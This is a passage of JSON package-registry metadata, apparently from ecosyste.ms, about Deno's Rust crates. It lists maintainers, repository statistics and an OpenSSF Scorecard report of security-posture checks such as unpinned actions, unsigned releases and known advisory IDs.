t_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_package_json/codemeta","maintainers":[{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-08-06T09:07:24.262Z","updated_at":"2024-08-06T09:07:24.262Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4310766,"name":"deno_simple_runtime","ecosystem":"cargo","description":"Provides the deno runtime library","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":18,"first_release_published_at":"2022-04-18T06:17:11.308Z","latest_release_published_at":"2022-08-21T03:00:24.690Z","latest_release_number":"0.73.2","last_synced_at":"2026-09-07T22:54:32.516Z","created_at":"2022-04-18T07:01:16.014Z","updated_at":"2026-09-07T22:54:32.516Z","registry_url":"https://crates.io/crates/deno_simple_runtime/","install_command":"cargo install deno_simple_runtime","documentation_url":"https://docs.rs/deno_simple_runtime/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url